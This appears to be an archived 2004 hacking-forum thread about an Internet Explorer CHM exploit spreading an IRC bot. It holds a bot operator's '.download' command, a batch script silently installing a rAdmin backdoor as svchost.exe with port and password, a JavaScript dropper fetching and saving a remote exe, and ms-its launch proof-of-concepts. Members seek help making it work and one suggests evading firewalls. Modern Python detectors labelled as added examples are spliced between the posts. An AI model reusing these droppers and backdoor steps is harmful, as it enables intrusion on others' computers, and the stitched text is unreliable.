Full Version: New Iesploit!
EXPLOiTED
Hey, I guess this is the new IESploit. But anyway.. I was checking it out... Here's the link: http://www.goon4hire.com/winrg.swf/ . It downloads a file called winumc.exe into your SYSTEM32\ then execs it. It connects to this IRC server: 193.14.113.1:6667

The server has an on-join version check.. if it doesn't have a certain version it G-lines you.... so I told my friend to run the exe and sniff, since I tried to connect to it right when I saw my firewall asking to go there... here's what we have
So I started sniffing... here's what I got

[10:45:40pm] [@Merkin] :zeexc!zpave@free-ppp076.modems.cwru.edu JOIN :#BOTS1.
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 332 zeexc #BOTS1. :.mirc spread stop
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 333 zeexc #BOTS1. _s_ 1081296848
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 353 zeexc @ #BOTS1. :zeexc @NickServ &ChanServ &_s_
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 366 zeexc #BOTS1. :End of /NAMES list.
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu


and him giving cmds
:_s_!OPER@OPER PRIVMSG #BOTS1. :zvkat: .download http://www.mega3.net/other/ra.exe c:\tmp03.exe 1
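As an added example (not code posted by anyone in this thread), here is a small Python detector for the kind of capture shown above: it strips the mIRC-style "[time] [@nick]" debug prefix, parses the raw IRC message, and flags dot-commands sent to a channel or set as its topic, then pulls the download URL and drop path out of any `.download` command as indicators. The sample capture is constructed from the lines above; reading the trailing `1` of `.download` as an execute-after-download flag is an assumption.

```python
"""Flag bot-control commands in a captured IRC session.

Added example for this thread, not code posted by any participant.
Input lines look like the sniffed capture above: an mIRC-style debug
prefix "[time] [@nick] " followed by a raw IRC protocol message.
"""
import re
from dataclasses import dataclass, field

# Constructed sample capture, modelled on the lines posted in the thread.
SAMPLE_CAPTURE = """\
[10:45:40pm] [@Merkin] :zeexc!zpave@free-ppp076.modems.cwru.edu JOIN :#BOTS1.
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 332 zeexc #BOTS1. :.mirc spread stop
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 366 zeexc #BOTS1. :End of /NAMES list.
[10:45:10pm] [@Merkin] :_s_!OPER@OPER PRIVMSG #BOTS1. :zvkat: .download http://www.mega3.net/other/ra.exe c:\\tmp03.exe 1
[10:46:01pm] [@Merkin] :someone!user@host PRIVMSG #chat :hello there
"""

_DEBUG_PREFIX = re.compile(r"^(?:\[[^\]]*\]\s*)+")      # "[time] [@nick] "
# "<botnick>: .cmd args" or just ".cmd args"
_BOT_CMD = re.compile(r"^(?:(?P<target>\S+):\s+)?\.(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")


@dataclass
class IrcMessage:
    prefix: str          # "nick!user@host" or a server name, without the leading ':'
    command: str         # PRIVMSG, JOIN, or a numeric such as 332
    params: list
    trailing: str        # text after " :"


@dataclass
class Alert:
    kind: str            # "privmsg-command" or "topic-command"
    channel: str
    issuer: str
    command: str
    args: list = field(default_factory=list)


def parse_irc_line(line):
    """Strip the client's debug prefix and split the IRC message."""
    line = _DEBUG_PREFIX.sub("", line.strip())
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else "")


def detect_bot_commands(capture):
    """Return an Alert for every dot-command seen in channel messages or topics."""
    alerts = []
    for raw in capture.splitlines():
        msg = parse_irc_line(raw)
        if msg is None:
            continue
        m = _BOT_CMD.match(msg.trailing)
        if not m:
            continue
        args = (m.group("args") or "").split()
        if msg.command == "PRIVMSG" and msg.params:
            issuer = msg.prefix.split("!", 1)[0]
            alerts.append(Alert("privmsg-command", msg.params[0], issuer, m.group("cmd").lower(), args))
        elif msg.command == "332" and len(msg.params) >= 2:
            # Numeric 332 is the channel topic; bots commonly read commands from it.
            alerts.append(Alert("topic-command", msg.params[1], msg.prefix, m.group("cmd").lower(), args))
    return alerts


def extract_download_indicators(alerts):
    """Pull URL and drop path out of .download commands. The trailing "1" is
    read here as an execute-after-download flag; that reading is an assumption."""
    found = []
    for a in alerts:
        if a.command == "download" and len(a.args) >= 2:
            found.append({"url": a.args[0], "drop_path": a.args[1], "execute": a.args[2:3] == ["1"]})
    return found


if __name__ == "__main__":
    found_alerts = detect_bot_commands(SAMPLE_CAPTURE)
    for a in found_alerts:
        print(f"{a.kind:16} {a.channel:8} from {a.issuer}: .{a.command} {' '.join(a.args)}")
    for ioc in extract_download_indicators(found_alerts):
        print("indicator:", ioc)
```

Both the topic (`.mirc spread stop`) and the operator's `.download` line come out as alerts, and the URL plus local drop path are what you would feed to a proxy blocklist or a host search.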
easternerd
great information my friend :)
thank you.
crash3rzz
yeah, this ownz, ty
EXPLOiTED
A vulnerability has been discovered in snmpdx and a buffer overflow found in mibiisa which may be exploited by a local or a remote attacker to gain root access on the affected system. The snmpdx master agent and the mibiisa agent run as daemons with root privileges on the system


SNMP vuln... Running Win2000.... the server, that is
EXPLOiTED
ftp://(filtered):****@193.14.113.1 691:87

...
Seems the guy decided to tag an FTP on it also.... bah... homo rooters.... I have some clues that this box is *nix.. I'm not sure though
Tyrano
This is the new flash exploit? or windows IE.
EXPLOiTED
Appears you get the exe loaded at this site as well

http://www.ilwig.net/rofl.swf
Truepower
here's the HTML from the ilwig site:

<html>
<head>
<title>Haha</title>
<style>
body { overflow-y: hidden; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; }
</style>
<script>
function readCookie(name) {
  var cookieValue = "";
  var search = name + "=";
  if(document.cookie.length > 0) {
    offset = document.cookie.indexOf(search);
    if (offset != -1) {
      offset += search.length;
      end = document.cookie.indexOf(";", offset);
      if (end == -1) end = document.cookie.length;
      cookieValue = unescape(document.cookie.substring(offset, end))
    }
  }
  return cookieValue;
}
if (readCookie("sVisited") != 1) self.location.href = "index1.html";
</script>
</head>
<body>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br />
<a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/>
<a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/>
<a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/>
<a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p>
</td>
<td width="85%" align="left" valign="top">
<div align="center"><embed src="flash.swf" width="100%" height="100%" border=0></div>
</body>
</html>
gerok
http://brasky.com/1/

the chm file is in there... I'm downloading the chm file and decompiling it at this moment... how does this sploit work?
EXPLOiTED
hm...so this is the IE CHM Sploit...
crash3rzz
<@EmericaX> ha
<@EmericaX> hmm
<@Merkin> thisis like a fuckin puzzle


<Merkin> [10:45:10pm] [@Merkin] :_s_!OPER@OPER PRIVMSG #BOTS1. :zvkat: .download http://www.mega3.net/other/ra.exe c:\tmp03.exe 1

the oper makes the bots download that file and save it as tmp03.exe
of course this is the link +

http://www.mega3.net/other/ra.exe

and there are the files

he uses rAdmin, mother (filtered)

this is the bat code
CODE


@echo off

echo REGEDIT4> settings.reg
echo [-HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> settings.reg
echo "DisableBeep"=hex:01,00,00,00>> settings.reg
regedit.exe /s settings.reg
del settings.reg

mkdir %SYSTEMROOT%\system

move ___1 %SYSTEMROOT%\system\svchost.exe
move ___2 %SYSTEMROOT%\system\admdll.dll
move ___3 %SYSTEMROOT%\system\raddrv.dll

%SYSTEMROOT%\system\svchost.exe /install /silence
%SYSTEMROOT%\system\svchost.exe /port:715 /pass:bullshit /save /silence
%SYSTEMROOT%\system\svchost.exe /start

echo REGEDIT4> settings.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server\]>> settings.reg
echo "DisplayName"="Remote Services Handler">> settings.reg
echo "Description"="Provides authorized system services handling between clients and servers on a local area or wide area network environments. If this service is disabled, any services that explicitly depend on it will fail to start.">> settings.reg
regedit.exe /s settings.reg
del settings.reg

del deploy.bat


well, seems to us he loaded these files to #Bots1 only
maybe fastbots? so he can (filtered) around

well... it's good, maybe more machines will get infected

Client for rAdmin: http://www.famatech.com/download/radmin21.zip

port = 715
pass = bullshit

:)
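As an added example (not from the thread's poster), the Python below turns a deployment batch file like the one pasted above into host indicators a responder can hunt for: registry keys written or deleted, value names set, files dropped, the service name, the listening port, a well-known system binary name living outside System32, and the script deleting itself. The sample batch text is a constructed abridgement of the script above, and the list of system binary names is this example's own assumption.

```python
"""Turn a dropper batch file into host indicators for hunting.

Added example for this thread, not code from any poster.
"""
import re

# Constructed sample: an abridged batch script in the shape of the one pasted above.
SAMPLE_BAT = r"""@echo off
echo REGEDIT4> settings.reg
echo [-HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> settings.reg
regedit.exe /s settings.reg
del settings.reg
mkdir %SYSTEMROOT%\system
move ___1 %SYSTEMROOT%\system\svchost.exe
move ___2 %SYSTEMROOT%\system\admdll.dll
%SYSTEMROOT%\system\svchost.exe /install /silence
%SYSTEMROOT%\system\svchost.exe /port:715 /pass:bullshit /save /silence
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server\]>> settings.reg
echo "DisplayName"="Remote Services Handler">> settings.reg
regedit.exe /s settings.reg
del deploy.bat
"""

# Names of Windows system binaries that malware likes to borrow (assumption: a short illustrative list).
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}

_REG_KEY = re.compile(r'echo\s+\[(-?)(HKEY_[^\]]+)\]')          # "-" marks a key deletion in .reg syntax
_REG_VALUE = re.compile(r'echo\s+"([^"]+)"=([^>]+)>')
_MOVE = re.compile(r'^(?:move|copy)\s+\S+\s+(\S+)', re.I | re.M)
_PORT = re.compile(r'/port:(\d+)', re.I)
_SERVICE = re.compile(r'\\Services\\([^\\\]]+)')
_SELF_DELETE = re.compile(r'^del\s+(\S+\.bat)\s*$', re.I | re.M)


def looks_masqueraded(path):
    """True when a well-known system binary name is placed outside System32."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in SYSTEM_BINARIES and "\\system32\\" not in path.lower()


def extract_indicators(bat_text):
    """Collect the artefacts the script would leave on a host, in script order."""
    keys, deleted = [], []
    for marker, key in _REG_KEY.findall(bat_text):
        bucket = deleted if marker == "-" else keys
        if key not in bucket:
            bucket.append(key)
    values = [name for name, _ in _REG_VALUE.findall(bat_text)]
    dropped = _MOVE.findall(bat_text)
    port = _PORT.search(bat_text)
    service = _SERVICE.search(bat_text)
    self_del = _SELF_DELETE.search(bat_text)
    return {
        "registry_keys": keys,
        "deleted_keys": deleted,
        "registry_values": values,
        "dropped_files": dropped,
        "masqueraded": [p for p in dropped if looks_masqueraded(p)],
        "listening_port": int(port.group(1)) if port else None,
        "service_name": service.group(1) if service else None,
        "self_delete": self_del.group(1) if self_del else None,
    }


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_BAT).items():
        print(f"{key:16} {value}")
```

The masquerade check is the one worth keeping on a host agent: a file called svchost.exe under %SYSTEMROOT%\system rather than System32 is a strong signal on its own, independent of the rest of this script.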
mfld
:D
EXPLOiTED
lol
gerok
this is the html file in the chm...

QUOTE


<script language="javascript">

payloadURL = "http://siteher.com/1.exe";

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\WINDOWS\\system32\\notepad.exe",2);
document.location="view-source:http://www.google.com/";

</script>



how do you get the actual chm to load? I tried...

QUOTE


<object data="ms-its:mhtml:file://C:\chm.mhtml!http://www.sitehere.com/1.chm::1.htm" type="text/x-scriptlet" style="visibility:hidden">




Help please? thanks!
dr0zaxx
The following proof-of-concept has been supplied:

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (i.e. launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security...one/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.
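As an added example (not code from any poster, and not from the advisory quoted above), here is a Python content filter of the kind a proxy or mail gateway could run against the two halves of this thread: the ms-its:/mk:@MSITStore: CHM-launch URLs in the advisory and gerok's posted CHM script, and the Microsoft.XMLHTTP fetch plus ADODB.Stream SaveToFile chain that writes the payload to disk. The samples are constructed from fragments quoted in this thread; the percent-encoded variant is this example's own illustration of the "encoded characters" point, not a form taken from the advisory.

```python
"""Flag ms-its:/mk:@MSITStore: CHM-launch URLs and ADODB.Stream file-drop
chains in HTML or script, the way a proxy or mail filter might.

Added example for this thread, not code from any poster or from the
advisory quoted above.
"""
import html
import re
from urllib.parse import unquote

# Constructed samples, modelled on the fragments quoted in this thread.
SAMPLES = {
    "object_tag": ('<object data="ms-its:mhtml:file://C:\\chm.mhtml!http://www.sitehere.com/1.chm::1.htm" '
                   'type="text/x-scriptlet" style="visibility:hidden">'),
    "img_tag": "<IMG SRC='ms-its:mhtml:file://C:\\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>",
    # Percent-encoded first byte: the example's own illustration of filter evasion by encoding.
    "encoded": "<iframe src='%6ds-its:mhtml:file://C:\\foo.mht!http://www.example.com/EXPLOIT.CHM::/exploit.htm'>",
    "dropper_script": ('<script language="javascript">'
                       'var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://siteher.com/1.exe", 0); x.Send();'
                       'var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);'
                       's.SaveToFile("C:\\\\WINDOWS\\\\system32\\\\notepad.exe", 2);</script>'),
    "codebase_exe": "<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>",
    "benign": '<a href="https://example.org/help.chm">Download the manual</a><script>var s = "stream";</script>',
}

_ITS_URL = re.compile(r"(?:ms-its|mk:@msitstore):[^\s'\"<>]+", re.I)
# local MHT wrapper ! remote CHM :: page inside it
_CHM_LAUNCH = re.compile(r"mhtml:file://[^!]+!(?:https?|ftp)://[^:\s]+::", re.I)
_ADODB_STREAM = re.compile(r"ActiveXObject\(\s*['\"]ADODB\.Stream['\"]\s*\)", re.I)
_XMLHTTP = re.compile(r"ActiveXObject\(\s*['\"]Microsoft\.XMLHTTP['\"]\s*\)", re.I)
_SAVE_TO_FILE = re.compile(r"\.SaveToFile\s*\(", re.I)
_CODEBASE_EXE = re.compile(r"CODEBASE\s*=\s*['\"]?[^'\"\s>]+\.exe\b", re.I)


def normalize(content):
    """Undo HTML entities and (bounded) nested percent-encoding before matching."""
    text = html.unescape(content)
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(content):
    """Return (kind, evidence) findings for the content; an empty list means clean."""
    text = normalize(content)
    findings = []
    for m in _ITS_URL.finditer(text):
        url = m.group(0)
        kind = "chm-remote-launch" if _CHM_LAUNCH.search(url) else "its-protocol-url"
        findings.append((kind, url))
    if _ADODB_STREAM.search(text) and _SAVE_TO_FILE.search(text):
        evidence = "ADODB.Stream + SaveToFile"
        if _XMLHTTP.search(text):
            evidence += " + XMLHTTP fetch"
        findings.append(("script-file-drop", evidence))
    for m in _CODEBASE_EXE.finditer(text):
        findings.append(("object-codebase-exe", m.group(0)))
    return findings


def verdict(content):
    return "block" if scan(content) else "allow"


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:15} {verdict(sample):5} {scan(sample)}")
```

Plain ms-its: links to a local .chm are reported separately from the mhtml-wrapped remote form, because the former is how Windows help itself is addressed and a blanket block would break it. For the script half, the host-side mitigation Microsoft shipped for this dropper pattern is the ADODB.Stream kill bit (KB870669): Compatibility Flags = 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}, which is the kind of .reg fix mentioned later in this thread.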
gerok
thank you! you rock!!!! :D
da_cash
great info.... thank you... I will check it
ind0r
I saw it before on SecurityFocus. There is also a solution (.reg) for IE.
K1LL3RB0Y
QUOTE (gerok @ Apr 7 2004, 08:38 AM)
this is the html file in the chm...

QUOTE


<script language="javascript">

payloadURL = "http://siteher.com/1.exe";

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\WINDOWS\\system32\\notepad.exe",2);
document.location="view-source:http://www.google.com/";

</script>



how do you get the actual chm to load? I tried...

QUOTE


<object data="ms-its:mhtml:file://C:\chm.mhtml!http://www.sitehere.com/1.chm::1.htm" type="text/x-scriptlet" style="visibility:hidden">




Help please? thanks!

hmm, this one works, only it downloads it; it doesn't load it. How can you load the exe file when it is on the remote PC?
bwc
man, can you give me a file --- "redirgen.php"? This is the one which is very important. Thanks a lot.
binary_hashes
please, we want details about this
LKM
I saw those links on various channels on EFNet..... beware!
Or patch hard :)
Serhat
QUOTE (EXPLOiTED @ Apr 7 2004, 02:47 AM)
when I saw my firewall asking to go there..

isn't very smart then..
if he was a bit smart (s)he would make the exploit use some commands like checking whether ZoneAlarm/NIS and other firewalls are running...
At least that would be smart...

Serhat
Invision Power Board © 2001-2005 Invision Power Services, Inc.